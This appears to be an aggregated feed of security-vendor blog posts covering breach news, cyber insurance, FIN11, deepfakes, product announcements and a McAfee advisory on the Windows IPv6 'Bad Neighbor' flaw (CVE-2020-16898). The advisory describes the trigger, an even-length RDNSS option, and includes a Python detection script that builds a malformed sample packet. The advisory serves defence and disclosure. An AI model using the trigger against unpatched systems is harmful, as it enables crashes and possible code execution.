Sanjay Mehta, senior vice president at Trend Micro, was recently named a new board member at Girls In Tech—a noted non-profit and Trend Micro partner working tirelessly to enhance the engagement, education, and empowerment of women in technology. In this blog, Sanjay shares five steps that you can use to become an ally for diversity in the workplace.

October Patch Tuesday: Microsoft Patches Critical, Wormable RCE Bug

In this month’s Patch Tuesday update, Microsoft pushed out fixes for 87 security vulnerabilities – 11 of them critical – and one of those is potentially wormable. There are also six bugs that were previously unpatched but publicly disclosed, which could give cybercriminals a leg up — and in fact at least one public exploit is already circulating for this group.

VirusTotal Now Supports Trend Micro ELF Hash

To help IoT and Linux malware researchers investigate attacks containing Executable and Linkable Format (ELF) files, Trend Micro created telfhash, an open-source clustering algorithm that helps cluster Linux IoT malware samples. VirusTotal has always been a valuable tool for threat research and now, with telfhash, users of the VirusTotal Intelligence platform can pivot from one ELF file to others.

New Emotet Attacks Use Fake Windows Update Lures

File attachments sent in recent Emotet campaigns show a message claiming to be from the Windows Update service, telling users that the Office app needs to be updated. Naturally, this must be done by clicking the Enable Editing button. According to the Cryptolaemus group, since yesterday, these Emotet lures have been spammed in massive numbers to users located all over the world.

Metasploit Shellcodes Attack Exposed Docker APIs

Trend Micro recently observed an interesting payload deployment using the Metasploit Framework (MSF) against exposed Docker APIs. The attack involves the deployment of Metasploit’s shellcode as a payload, and researchers said this is the first attack they’ve seen using MSF against Docker. It also uses a small, vulnerability-free base image in order for the attack to proceed in a fast and stealthy manner.

Barnes & Noble Warns Customers It Has Been Hacked, Customer Data May Have Been Accessed

American bookselling giant Barnes & Noble is contacting customers via email, warning them that its network was breached by hackers, and that sensitive information about shoppers may have been accessed. In the email to customers, Barnes & Noble says that it became aware that it had fallen victim to a cybersecurity attack on Saturday, October 10th.

ContentProvider Path Traversal Flaw on ESC App Reveals Info

Trend Micro researchers found ContentProvider path traversal vulnerabilities in three apps on the Google Play store, one of which had more than 5 million installs. The three applications include a keyboard customization app, a shopping app from a popular department store, and the app for the European Society of Cardiology (ESC). Fortunately, the keyboard and department store apps have both been patched by developers. However, as of writing this blog, the ESC app is still active.

Carnival Corp. Ransomware Attack Affects Three Cruise Lines

Hackers accessed personal information of guests, employees and crew of three cruise line brands and the casino operations of Carnival Corp. in a ransomware attack the company suffered on Aug. 15, officials have confirmed. Carnival Cruise Line, Holland America Line and Seabourn were the brands affected by the attack, which Carnival said they’re still investigating in an update on the situation this week.

Docker Content Trust: What It Is and How It Secures Container Images

Docker Content Trust allows users to deploy images to a cluster or swarm confidently and verify that they are the images you expect them to be. In this blog from Trend Micro, learn how Docker Content Trust works, how to enable it, steps that can be taken to automate trust validation in the continuous integration and continuous deployment (CI/CD) pipeline and limitations of the system.

Twitter Hackers Posed as IT Workers to Trick Employees, NY Probe Finds

A simple phone scam was the key first step in the Twitter hack that took over dozens of high-profile accounts this summer, New York regulators say. The hackers responsible for the July 15 attack called Twitter employees posing as company IT workers and tricked them into giving up their login credentials for the social network’s internal tools, the state’s Department of Financial Services said.

What is a DDoS Attack? Everything You Need to Know About Distributed Denial-of-Service Attacks and How to Protect Against Them

A distributed denial-of-service (DDoS) attack sees an attacker flooding the network or servers of the victim with a wave of internet traffic so big that their infrastructure is overwhelmed by the number of requests for access, slowing down services or taking them fully offline and preventing legitimate users from accessing the service at all. DDoS attacks are one of the crudest forms of cyberattacks, but they’re also one of the most powerful and can be difficult to stop.

Cyberattack on London Council Still Having ‘Significant Impact’

Hackney Council in London has said that a cyberattack earlier this week is continuing to have a “significant impact” on its services. Earlier this week, the north London council said it had been the target of a serious cyberattack, which was affecting many of its services and IT systems.

 

Surprised by the new Emotet attack?  Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Cybercriminals Use Stolen Data and Hacking Tools as Prizes in Poker Games and Rap Battles and VirusTotal Now Supports Trend Micro ELF Hash appeared first on .

BA fined record £20m for customer data breach

Personal details of more than 400,000 customers accessed by hackers in 2018

A £183m fine levied on British Airways for a data breach has been reduced to £20m after investigators took into account the airline’s financial plight and the circumstances of the cyber-attack.

The £20m fine is nonetheless the biggest ever issued by the Information Commissioner’s Office (ICO), following the 2018 incident in which more than 400,000 customers’ personal details were compromised by hackers.

Cyber insurance: A guide for businesses

Cyber threats are so numerous that it’s impossible to prevent security incidents altogether.

That’s why organisations are increasingly relying on cyber insurance policies to cover the costs when data breaches and cyber attacks occur.

But just how helpful is cyber insurance? We take a look at everything you need to know in this blog.

What is cyber insurance?

Cyber insurance is a specific type of protection, helping organisations mitigate the financial costs associated with information security incidents.

These costs typically won’t be included in standard business insurance policies, which tend to cover only the damage or loss of equipment itself, rather than harm caused by a cyber security event.

How does cyber insurance work?

When a covered organisation suffers a security incident and submits a claim, the insurer will investigate and then pay out accordingly.

Security incidents cause many issues that can’t be fixed with financial reimbursement, such as the time and effort it takes to recover or the reputational damage you could face.

Likewise, the cost of a data breach is related to the speed at which organisations can detect and respond to an incident. Indeed, Ponemon Institute’s Cost of a Data Breach Report 2020 found that organisations that can address a breach within 200 days save about £750,000 compared to those that take longer to respond.

If organisations have to wait for their insurer to review the incident, the costs will escalate and their premium will increase.

You must therefore view cyber insurance as a complement to your cyber security defences and an extra resource to mitigate costs rather than an alternative.

What does a cyber insurance policy cover?

Cyber insurance covers the financial costs of incidents that affect the confidentiality, integrity and availability of information. This includes cyber attacks and data breaches, as well as other events that impact IT systems and networks.

Policies generally provide organisations with the means to manage the incident. This includes forensic investigation, incident response, legal assistance and public relations support.

What is not covered by cyber insurance?

Cyber insurance policies generally don’t cover damages that were caused or exacerbated by the organisation itself.

This might include business email compromise fraud or acts of gross negligence.

Likewise, some insurers won’t reimburse organisations that pay up after a ransomware attack, given that experts advise organisations not to pay because payment helps fuel the cyber crime industry and could make the organisation a soft target for future attacks.

Who needs cyber insurance?

Any organisation that relies on information technology or processes sensitive data is vulnerable to cyber attacks and data breaches, and should therefore consider cyber insurance.

You can find out whether cyber insurance is the right strategy by following ISO 27001’s risk assessment methodology, which helps organisations decide the most appropriate way to address cyber security issues.

Organisations can:

  • Modify the risk by applying security controls that will reduce the likelihood of it occurring and/or damage it will cause.
  • Retain the risk by accepting that it falls within previously established risk acceptance criteria, or via extraordinary decisions.
  • Avoid the risk by changing the circumstances that are causing it.
  • Share the risk with a partner, such as a cyber insurance firm or a third party that is better equipped to manage the risk.

How much does cyber insurance cost?

An AdvisorSmith study found that the average cost of cyber insurance was $1,500 (about £1,160) per year for $1 million (£770,000) in coverage.

However, the costs will vary greatly depending on the organisation’s size, industry, the amount of sensitive data it processes and the strength of its existing cyber security measures.

Some insurers may also offer different levels of protection. For example, you could pay less each month but be covered against a smaller set of damages – or vice versa.

Is my existing cyber security enough?

Organisations are free to decide whether they should purchase cyber insurance.

In most cases, there is no legal or contractual requirement to have cyber insurance, so the organisation might decide that its budget is better spent on cyber defences and business continuity management.

However, there may well be times where it makes financial sense to invest in cyber insurance, for example when the costs of a breach far exceed the amount you would be paying in coverage.

Also, it’s worth remembering that almost all insurance brokers state that the organisation must take appropriate steps to prevent security incidents.

Make sure you have the right defences in place with our Cyber Security as a Service.

With this annual subscription service, our experts are on hand to advise you on the best way to protect your organisation.

They’ll guide you through a variety of security practices – including vulnerability scans, staff training and the creation of policies and procedures – ensuring that you have the foundations of an effective security strategy.

These measures will help you stay one step ahead of cyber criminals, preventing a wide array of threats and putting you in a position to claim competitive cyber insurance rates.

The post Cyber insurance: A guide for businesses appeared first on IT Governance UK Blog.

Hot off the Press: Veracode Named a 2020 Gartner Peer Insights Customers’ Choice for AST

Veracode has been officially recognized by Gartner Peer Insights as a 2020 Customers’ Choice for Application Security Testing. The report includes Veracode’s aggregate score of 4.6 out of 5 stars out of 95 independent customer reviews (as of July 31, 2020), and of the reviewers, 92 percent said that they would recommend Veracode’s AST solutions.

Veracode is the largest global provider of application security testing (AST) solutions. Receiving the Customers’ Choice distinction, just months after Veracode was named a Leader for the seventh consecutive time in the Gartner Inc. 2020 Magic Quadrant for Application Security Testing, is a true testament to our solutions.

“There is no greater endorsement than the voice and passion of our customers,” said Sam King, CEO of Veracode. “This Customers’ Choice distinction by Gartner Peer Insights reflects the impact of our best-in-class solutions and customer service. Veracode is committed to helping our customers navigate the ever-evolving application security landscape, with an impassioned focus on empowering developers to both find and fix code defects early in the development process. Thank you to all the Veracode customers worldwide that have made us their trusted partner in secure software delivery.”

What are our customers saying in their reviews on Gartner Peer Insights? Many tout Veracode’s SaaS-based solution as a key benefit. “They operate a ‘service-based solution’ removing many of the obstacles typical of on-premises scan solutions,” stated a May 22, 2020 review by the director of security and risk at a manufacturing company. Our customers also talk about how Veracode empowers developers to find and fix code defects early in the development process. A director of application development for the government sector remarked in a review on July 24, 2020, “[Veracode] was incredibly easy to implement and we had a high rate of developer adoption. We saw phenomenal results in reducing our security risk within the first six months. We are now several years into product implementation and have grown our adoption with both product and automation.”

To learn more about Gartner Peer Insights 2020 Customers’ Choice for AST and what our customers have to say about our leading application security testing solutions, download the Peer Insights Voice of the Customer report.

Disclaimer: Gartner Peer Insights Customers’ Choice constitute the subjective opinions of individual end-user reviews, ratings, and data applied against a documented methodology; they neither represent the views of, nor constitute an endorsement by, Gartner or its affiliates.

Gartner Peer Insights “Voice of the Customer”: Application Security Testing, Peer Contributors, 9 October 2020

Introducing Veracode’s New Partner Training and Certification Paths

We are excited to announce the launch of our new partner training and certification paths, open to all authorized Veracode partners.

Based on partner feedback, we have designed these paths to provide a deeper understanding of the Veracode story and technical details around application security (AppSec). By enlisting in our training and certification paths, we enable partners to expand their business and support customers in developing a comprehensive AppSec program.

Some of the benefits of this new program:

  • Free-of-charge, best-in-class trainings and certifications focused on AppSec.
  • On-demand, self-paced paths that enable partners to learn what they want, when they want.
  • Added visibility for individuals earning their certification with designated badges, showcasing the partner’s AppSec expertise.
  • Greater access to leads and joint opportunities for partners with certified individuals.

These new training and certification paths give partners a choice of three levels of learning. Through on-demand, self-paced courses they can advance to the level of training that best suits their role – ultimately growing their business through application security offerings.

Training levels

With this deeper level of knowledge, partners can expand their customer base, and sales and technical teams can support their prospects and customers more effectively in building and managing their AppSec program.

As always, we remain committed to our partners who do the important work of caring for customers – whether across the globe or in local and regional markets. We hope these new training and certification paths inspire further collaboration, increased business growth, and an even better experience for customers and prospects.

For more information on our partner training and certification, please contact your Veracode regional channel manager or send an email to partners@veracode.com.

FIN11: Widespread Email Campaigns as Precursor for Ransomware and Data Theft

Mandiant Threat Intelligence recently promoted a threat cluster to a named FIN (or financially motivated) threat group for the first time since 2017. We have detailed FIN11's various tactics, techniques and procedures in a report that is available now by signing up for Mandiant Advantage Free.

In some ways, FIN11 is reminiscent of APT1; they are notable not for their sophistication, but for their sheer volume of activity. There are significant gaps in FIN11’s phishing operations, but when active, the group conducts up to five high-volume campaigns a week. While many financially motivated threat groups are short lived, FIN11 has been conducting these widespread phishing campaigns since at least 2016. From 2017 through 2018, the threat group primarily targeted organizations in the financial, retail, and hospitality sectors. However, in 2019 FIN11’s targeting expanded to include a diverse set of sectors and geographic regions. At this point, it would be difficult to name a client that FIN11 hasn’t targeted.

Mandiant has also responded to numerous FIN11 intrusions, but we’ve only observed the group successfully monetize access in few instances. This could suggest that the actors cast a wide net during their phishing operations, then choose which victims to further exploit based on characteristics such as sector, geolocation or perceived security posture. Recently, FIN11 has deployed CLOP ransomware and threatened to publish exfiltrated data to pressure victims into paying ransom demands. The group’s shifting monetization methods—from point-of-sale (POS) malware in 2018, to ransomware in 2019, and hybrid extortion in 2020—is part of a larger trend in which criminal actors have increasingly focused on post-compromise ransomware deployment and data theft extortion.

Notably, FIN11 includes a subset of the activity security researchers call TA505, but we do not attribute TA505’s early operations to FIN11 and caution against using the names interchangeably. Attribution of both historic TA505 activity and more recent FIN11 activity is complicated by the actors’ use of criminal service providers. Like most financially motivated actors, FIN11 doesn’t operate in a vacuum. We believe that the group has used services that provide anonymous domain registration, bulletproof hosting, code signing certificates, and private or semi-private malware. Outsourcing work to these criminal service providers likely enables FIN11 to increase the scale and sophistication of their operations.

To learn more about FIN11’s evolving delivery tactics, use of services, post-compromise TTPs, and monetization methods, register for Mandiant Advantage Free. The full FIN11 report is also available through our FireEye Intelligence Portal (FIP). Then for even more information, register for our exclusive webinar on Oct. 29 where Mandiant threat intelligence experts will take a deeper dive into FIN11, including its origins, tactics, and potential for future activity. 

The Deepfakes Lab: Detecting & Defending Against Deepfakes with Advanced AI

Detrimental lies are not new. Even misleading headlines and text can fool a reader.  However, the ability to alter reality has taken a leap forward with “deepfake” technology which allows for the creation of images and videos of real people saying and doing things they never said or did. Deep learning techniques are escalating the technology’s finesse, producing even more realistic content that is increasingly difficult to detect.

Deepfakes began to gain attention when a fake pornography video featuring a “Wonder Woman” actress was released on Reddit in late 2017 by a user with the pseudonym “deepfakes.” Several doctored videos have since been released featuring high-profile celebrities, some of which were purely for entertainment value and others which have portrayed public figures in a demeaning light. This presents a real threat. The internet already distorts the truth as information on social media is presented and consumed through the filter of our own cognitive biases.

Deepfakes will intensify this problem significantly. Celebrities, politicians and even commercial brands can face unique forms of threat tactics, intimidation, and personal image sabotage. The risks to our democracy, justice, politics and national security are serious as well. Imagine a dark web economy where deepfakers produce misleading content that can be released to the world to influence which car we buy, which supermarket we frequent, and even which political candidate receives our vote. Deepfakes can touch all areas of our lives; hence, basic protection is essential.

How are Deepfakes Created?

Deepfakes are a cutting-edge advancement of Artificial Intelligence (AI) often leveraged by bad actors who use the technology to generate increasingly realistic and convincing fake images, videos, voice, and text. These videos are created by the superimposition of existing images, audio, and videos onto source media files by leveraging an advanced deep learning technique called “Generative Adversarial Networks” (GANs). GANs are relatively recent concepts in AI which aim to synthesize artificial images that are indistinguishable from authentic ones. The GAN approach brings two neural networks to work simultaneously: one network called the “generator” draws on a dataset to produce a sample that mimics it. The other network, known as the “discriminator”, assesses the degree to which the generator succeeded. Iteratively, the assessments of the discriminator inform the assessments of the generator. The increasing sophistication of GAN approaches has led to the production of ever more convincing and nearly impossible to expose deepfakes, and the result far exceeds the speed, scale, and nuance of what human reviewers could achieve.

McAfee Deepfakes Lab Applies Data Science Expertise to Detect Bogus Videos

To mitigate this threat, McAfee today announced the launch of the McAfee Deepfakes Lab to focus the company’s world-class data science expertise and tools on countering the  deepfake menace to individuals, organizations, democracy and the overall integrity of information across our society. The Deepfakes Lab combines computer vision and deep learning techniques to exploit hidden patterns and detect manipulated video elements that play a key role in authenticating original media files.  

To ensure the prediction results of the deep learning framework and the origin of solutions for each prediction are understandable, we spent a significant amount of time visualizing the layers and filters of our networks then added a model-agnostic explainability framework on top of the detection framework. Having explanations for each prediction helps us make an informed decision about how much we trust the image and the model as well as provide insights that can be used to improve the latter.

We also performed detailed validation and verification of the detection framework on a large dataset and tested detection capability on deepfake content found in the wild. Our detection framework was able to detect a recent deepfake video of Facebook’s Mark Zuckerberg giving a brief speech about the power of big data. The tool not only provided an accurate detection score but generated heatmaps via the model-agnostic explainability module highlighting the parts of his face contributing to the decision, thereby adding trust in our predictions.

Such easily available deepfakes reiterate the challenges that social networks face when it comes to policing manipulated content. As advancements in GAN techniques produce very realistic looking fake images, advanced computer vision techniques will need to be developed to identify and detect advanced forms of deepfakes. Additionally, steps need to be taken to defend against deepfakes by making use of watermarks or authentication trails.

Sounding the Alarm

We realize that news media do have considerable power in shaping people’s beliefs and opinions. As a consequence, their truthfulness is often compromised to maximize impact. The dictum “a picture is worth a thousand words” accentuates the significance of the deepfake phenomenon. Credible yet fraudulent audio, video, and text will have a much larger impact that can be used to ruin celebrity and brand reputations as well as influence political opinion with terrifying implications. Computer vision and deep learning detection frameworks can authenticate and detect fake visual media and text content, but the damage to reputations and influencing opinion remains.

In launching the Deepfakes Lab, McAfee will work with traditional news and social media organizations to identify malicious deepfake videos during this crucial 2020 national election season and help combat this new wave of disinformation associated with deepfakes.

In our next blog on deepfakes, we will demonstrate our detailed detection framework. With this framework, we will be helping to battle disinformation and minimize the growing challenge of deepfakes.

To engage the services of the McAfee Deepfakes Lab, news and social media organizations may submit suspect video for analysis by sending content links to media@mcafee.com.

 

The post The Deepfakes Lab: Detecting & Defending Against Deepfakes with Advanced AI appeared first on McAfee Blogs.

Election 2020 – How to Spot Phony Deepfake Videos this Election


Maybe you’ve seen videos where Robert Downey Jr. and other cast members of The Avengers follow the yellow brick road after they swap faces with the cast of 1939’s The Wizard of Oz. Or how about any of the umpteen videos where the face of actor Nicolas Cage is swapped with, well, everybody, from the cast of Friends to Forrest Gump. They’re funny, uncanny, and sometimes a little too real. Welcome to deepfakes, a technology that can be entertaining, yet one that has election year implications—now and for years to come.

What are deepfakes?

Deepfakes are phoney video or audio recordings that look and sound real, so much so that the best of them can dupe people into thinking they’re the real thing. They’re not unlike those face-swapping apps your children or nieces and nephews may have on their phones, albeit more sophisticated. Less powerful versions of deepfaking software are used by the YouTube channels that create the videos I mentioned above. However, more sophisticated deepfake technologies have chilling repercussions when it comes to public figures, such as politicians.

Imagine creating a video of a public figure where you literally put words into their mouth. That’s what deepfakes effectively do. This can lead to threat tactics, intimidation, and personal image sabotage—and in an election year, the spread of disinformation.

Deepfakes sow the seeds of doubt

Deepfakes can make you question if what you’re seeing, and hearing, is actually real. In terms of an election year, they can introduce yet another layer of doubt into our discourse—leading people to believe that a political figure has said something that they’ve never said. And, conversely, giving political figures an “out” where they might decry a genuine audio or video clip as a deepfake, when in fact it is not.

The technology and security industries have responded by rolling out their own efforts to detect and uncover deepfakes. Here at McAfee, we’ve launched McAfee Deepfakes Lab, which provides traditional news and social media organizations advanced Artificial Intelligence (AI) analysis of suspected deepfake videos intended to spread reputation-damaging lies about individuals and organizations during the 2020 U.S. election season and beyond.

However, what can you do when you encounter, or think you encounter, a deepfake on the internet? Just like in my recent blog on election misinformation, a few tips on media savvy point the way.

How to spot deepfakes

While the technology continually improves, there are still typical telltale signs that a video you’re watching is a deepfake. Creators of deepfakes count on you to overlook some fine details, as the technology today largely has difficulty capturing the subtle touches of their subjects. Take a look at:

  • Their face. Head movement can cause a slight glitch in the rendering of the image, particularly because the technology works best when the subject is facing toward the camera.
  • Their skin. Blotchy patches, irregular skin tones, or flickering at the edges of the face are all signs of deepfake videos.
  • Their eyes. Other glitches may come by way of eyeglasses, eyes that look expressionless, and eyes that appear to be looking in the wrong direction. Likewise, the light reflected in their irises may look strangely lit in a way that does not match the setting.
  • Their hair. Flyaway hairs and some of the irregularities you’ll find in a person’s smile continue to be problematic for deepfakes. Instead, that head of hair could look a little too perfect.
  • Their smile. Teeth don’t always render well in deepfakes, sometimes looking more like white bars instead of showing the usual irregularities we see in people’s smiles. Also, look out for inconsistencies in the lip-syncing.

Listen closely to what they’re saying, and how they’re saying it

This is important. Like I pointed out in my recent article on how to spot fake news and misinformation in your social media feed, deepfake content is meant to stir your emotions—whether that’s a sense of ridicule, derision, outrage, or flat-out anger. While an emotional response to some video you see isn’t a hard and fast indicator of a deepfake itself, it should give you a moment of pause. Listen to what’s being said. Consider its credibility. Question the motives of the producer or poster of the video. Look to additional credible sources to verify that the video is indeed real.

How the person speaks is important to consider as well. Another component of deepfake technology is audio deepfaking. As recently as 2019, fraudsters used audio deepfake technology to swindle nearly $250,000 from a UK-based energy firm by mimicking the voice of its CEO over the phone. Like their video counterparts, audio deepfakes can sound uncannily real, or at least real enough to sow a seed of doubt. Characteristically, the technology has its shortcomings. Audio deepfakes can sound “off,” meaning that they can sound cold, as if the normal human emotional cues have been stripped away—or that the cadence is off, making them sound flat the way a robocall does.

As with all things this election season and beyond, watch carefully, listen critically. And always look for independent confirmation. For more information on our .GOV-HTTPS county website research, potential disinformation campaigns, other threats to our elections, and voter safety tips, please visit our Elections 2020 page: https://www.mcafee.com/enterprise/en-us/2020-elections.html

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Election 2020 – How to Spot Phony Deepfake Videos this Election appeared first on McAfee Blogs.

CVE-2020-16898: “Bad Neighbor”


CVSS Score: 8.8

Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C

Overview
Today, Microsoft announced a critical vulnerability in the Windows IPv6 stack, which allows an attacker to send maliciously crafted packets to potentially execute arbitrary code on a remote system. The proof-of-concept shared with MAPP (Microsoft Active Protection Program) members is both extremely simple and perfectly reliable. It results in an immediate BSOD (Blue Screen of Death), but more so, indicates the likelihood of exploitation for those who can manage to bypass Windows 10 and Windows Server 2019 mitigations. The effects of an exploit that would grant remote code execution would be widespread and highly impactful, as this type of bug could be made wormable. For ease of reference, we nicknamed the vulnerability “Bad Neighbor” because it is located within an ICMPv6 Neighbor Discovery “Protocol”, using the Router Advertisement type.

Vulnerability Details
A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets that use Option Type 25 (Recursive DNS Server Option) and a length field value that is even. In this Option, the length is counted in increments of 8 bytes, so an RDNSS option with a length of 3 should have a total length of 24 bytes. The option itself consists of five fields: Type, Length, Reserved, Lifetime, and Addresses of IPv6 Recursive DNS Servers. The first four fields always total 8 bytes, but the last field can contain a variable number of IPv6 addresses, which are 16 bytes each. As a result, the length field should always be an odd value of at least 3, per RFC 8106:

When an IPv6 host receives DNS options (i.e., RDNSS and DNSSL
options) through RA messages, it processes the options as follows:

   o  The validity of DNS options is checked with the Length field;
      that is, the value of the Length field in the RDNSS option is
      greater than or equal to the minimum value (3) and satisfies the
      requirement that (Length - 1) % 2 == 0.

When an even length value is provided, the Windows TCP/IP stack incorrectly advances the network buffer by an amount that is 8 bytes too few. This is because the stack internally counts in 16-byte increments, failing to account for the case where a non-RFC compliant length value is used. This mismatch results in the stack interpreting the last 8 bytes of the current option as the start of a second option, ultimately leading to a buffer overflow and potential RCE.

It is likely that a memory leak or information disclosure bug in the Windows kernel would be required in order to build a full exploit chain for this vulnerability. Despite this, we expect to see working exploits in the very near future.

Threat Surface
The largest impact here will be to consumers on Windows 10 machines, though with Windows Updates the threat surface is likely to be quickly minimized. While Shodan.io shouldn’t be counted on as a definitive source, our best queries put the number of Windows Server 2019 machines with IPv6 addresses in the hundreds, not exceeding approximately 1000. This is likely because most servers are behind firewalls or hosted by Cloud Service Providers (CSPs) and not reachable directly via Shodan scans.

Detection
We believe this vulnerability can be detected with a simple heuristic that parses all incoming ICMPv6 traffic, looking for packets with an ICMPv6 Type field of 134 – indicating Router Advertisement – and an ICMPv6 Option field of 25 – indicating Recursive DNS Server (RDNSS). If this RDNSS option also has a length field value that is even, the heuristic would drop or flag the associated packet, as it is likely part of a “Bad Neighbor” exploit attempt.
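The heuristic described above, as an added Python example (not McAfee's Suricata rule or Lua script): it walks the options of an ICMPv6 Router Advertisement and flags any RDNSS option whose Length field is below 3 or even, per the RFC 8106 check quoted earlier. The function names, the `Finding` tuple and the sample messages are constructed for illustration, and the input is assumed to start at the ICMPv6 Type byte.

```python
import ipaddress
import struct
from typing import List, NamedTuple

ICMPV6_ROUTER_ADVERTISEMENT = 134   # ICMPv6 Type: Router Advertisement
ND_OPT_RDNSS = 25                   # Option Type: Recursive DNS Server (RFC 8106)
RA_FIXED_LEN = 16                   # RA bytes that precede the first option


class Finding(NamedTuple):
    offset: int   # where the option starts inside the ICMPv6 message
    length: int   # raw Length field, counted in units of 8 bytes
    reason: str


def check_router_advertisement(icmpv6: bytes) -> List[Finding]:
    """Flag RDNSS options whose Length field violates RFC 8106."""
    findings: List[Finding] = []
    if len(icmpv6) < RA_FIXED_LEN or icmpv6[0] != ICMPV6_ROUTER_ADVERTISEMENT:
        return findings                      # not a Router Advertisement
    offset = RA_FIXED_LEN
    while offset + 2 <= len(icmpv6):
        opt_type, opt_len = icmpv6[offset], icmpv6[offset + 1]
        if opt_len == 0:
            # RFC 4861: an ND packet with a zero-length option must be discarded.
            findings.append(Finding(offset, 0, "zero-length option"))
            break
        if opt_type == ND_OPT_RDNSS:
            if opt_len < 3:
                findings.append(
                    Finding(offset, opt_len, "RDNSS length below minimum of 3"))
            elif (opt_len - 1) % 2 != 0:
                findings.append(
                    Finding(offset, opt_len, "RDNSS length is even"))
        if offset + opt_len * 8 > len(icmpv6):
            findings.append(
                Finding(offset, opt_len, "option runs past end of message"))
            break
        offset += opt_len * 8                # stride by the declared length
    return findings


# --- Constructed sample messages (no IPv6 header, checksum left as 0) ---

def build_ra(options: bytes) -> bytes:
    """Minimal RA: type, code, checksum, hop limit, flags, lifetimes, timers."""
    header = struct.pack("!BBHBBHII",
                         ICMPV6_ROUTER_ADVERTISEMENT, 0, 0, 64, 0, 1800, 0, 0)
    return header + options


def rdnss_option(length_field: int, addresses: bytes) -> bytes:
    """RDNSS option: Type, Length, Reserved, Lifetime, then the address field."""
    fixed = struct.pack("!BBHI", ND_OPT_RDNSS, length_field, 0, 600)
    body_len = max(length_field * 8 - len(fixed), 0)
    return fixed + addresses.ljust(body_len, b"\x00")[:body_len]


# Source link-layer address option (type 1, length 1) placed before RDNSS
# so the walker has to step over an unrelated option first.
SLLA_OPTION = bytes([1, 1]) + bytes.fromhex("020000000001")
DNS_SERVER = ipaddress.IPv6Address("2001:db8::53").packed  # documentation prefix

COMPLIANT_RA = build_ra(SLLA_OPTION + rdnss_option(3, DNS_SERVER))
EVEN_LENGTH_RA = build_ra(SLLA_OPTION + rdnss_option(4, DNS_SERVER))

if __name__ == "__main__":
    for name, msg in (("compliant", COMPLIANT_RA), ("even length", EVEN_LENGTH_RA)):
        print(name, check_router_advertisement(msg))
```
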

Mitigation
Patching is always the first and most effective course of action. If this is not possible, the best mitigation is disabling IPv6, either on the NIC or at the perimeter of the network by dropping ICMPv6 traffic if it is non-essential. Additionally, ICMPv6 Router Advertisements can be blocked or dropped at the network perimeter. Windows Defender and Windows Firewall fail to block the proof-of-concept when enabled. It is unknown yet if this attack can succeed by tunneling the ICMPv6 traffic over IPv4 using technologies like 6to4 or Teredo. Our efforts to repeat the attack in this manner have not been successful to date.

For those McAfee customers who are unable to deploy the Windows patch, the following Network Security Platform (NSP) signatures will provide a virtual patch against attempted exploitation of this vulnerability, as well as a similar vulnerability (CVE-2020-16899). Unlike “Bad Neighbor”, the impact of CVE-2020-16899 is limited to denial-of-service in the form of BSoD.

NSP Attack ID: 0x40103a00 – ICMP: Windows IPv6 Stack Elevation of Privilege Vulnerability (CVE-2020-16898)
NSP Attack ID: 0x40103b00 – ICMP: Windows Function Discovery SSDP Provider Elevation of Privilege Vulnerability (CVE-2020-16899)

Additionally, we are releasing Suricata rules to detect potential exploitation of these vulnerabilities. Due to limitations in open source tools such as Snort and Suricata, we found that implementing the minimal detection logic described earlier required combining Suricata with its built-in Lua script parser. We have hosted the rules and Lua scripts at our public GitHub under CVE-2020-16898 and CVE-2020-16899 respectively. Although we have confirmed that the rules correctly detect use of the proof-of-concepts, they should be thoroughly vetted in your environment prior to deployment to avoid risk of any false positives.

The post CVE-2020-16898: “Bad Neighbor” appeared first on McAfee Blogs.

“Best of Breed” – CASB/DLP and Rights Management Come Together

Securing documents before cloud

Before the cloud, organizations would collaborate and store documents on desktop/laptop computers, email and file servers. Private cloud use-cases such as accessing and storing documents on intranet web servers and network attached storage (NAS) improved the end-user’s experience. The security model followed a layered approach, where keeping this data safe was just as important as not allowing unauthorized individuals into the building or data center. This was followed by a directory service to sign in to, protecting your personal computer, then permissions on files stored on file servers to assure safe usage.

Enter the cloud

Most organizations now consider cloud services to be essential in their business. Services like Microsoft 365 (Sharepoint, Onedrive, Teams), Box, and Slack are depended upon by all users. The same fundamental security concepts exist – however many are covered by the cloud service themselves. This is known as the “Shared Security Model” – essentially the Cloud Service Provider handles basic security functions (physical security, network security, operations security), but ultimately the end customer must correctly give access to data and is ultimately responsible for properly protecting it.

The big difference between the two is that in the first security model, the organization owned and controlled the entire process. In the second cloud model, the customer owns the controls surrounding the data they choose to put in the cloud. This is the risk that collaborating and storing data in the cloud brings: once the documents have been stored in M365, what happens if they are mishandled from this point forward? Who is handling these documents? If my most sensitive information has left the safe confines of the cloud service, how can I protect it once it leaves? Fundamentally: How can I control data that lives hypothetically anywhere, including areas that I do not have control over?

Adding the protection layers that are cloud-native

McAfee and Seclore have extended an integration recently to address these cloud-based use cases. This integration fundamentally answers this question: If I put sensitive data in the cloud that I do not control, can I still protect the data regardless of where it lives?

The solution works like this:

The solution puts guardrails around end-user cloud usage, but also adds significant compliance protections, security operations, and data visibility for the organization.

Data visibility, compliance & security operations

Once an unprotected sensitive file has been uploaded to a cloud service, McAfee MVISION Cloud Data Loss Prevention (DLP) detects the file upload. Customers can assign a DLP policy to find sensitive data such as credit card data (PCI), customer data, personally identifiable information (PII) or any other data they find to be sensitive.

Sample MVISION Cloud DLP Policy

If data is found to be in violation of policy, it means the data must be properly protected. For example, if the DLP engine finds PII, rather than let it sit unprotected in the cloud service, the McAfee policy the customer sets should enact some protection on the file. This action is known as a “Response”, and MVISION Cloud will properly show the detection, violating data, and actions taken in the incident data. In this case, McAfee will call Seclore to protect the file. These actions can be performed in near real-time, or protection can be enacted on data that already exists in the cloud service (on demand scan).

“Seclore-It” – Protection Beyond Encryption

Now that the file has been protected, downstream access to the file is managed by Seclore’s policy engine. Examples of policy-based access could be end-user location, data type, user group, time of day, or any other combination of policy choices. The key principle here is the file is protected regardless of where it goes and enforced by a Seclore policy that the organization sets. If a user accesses the file, an audit trail is recorded to assure that organizations have the confidence that data is properly protected. The audit logs show allows and denies, completing the data visibility requirements.

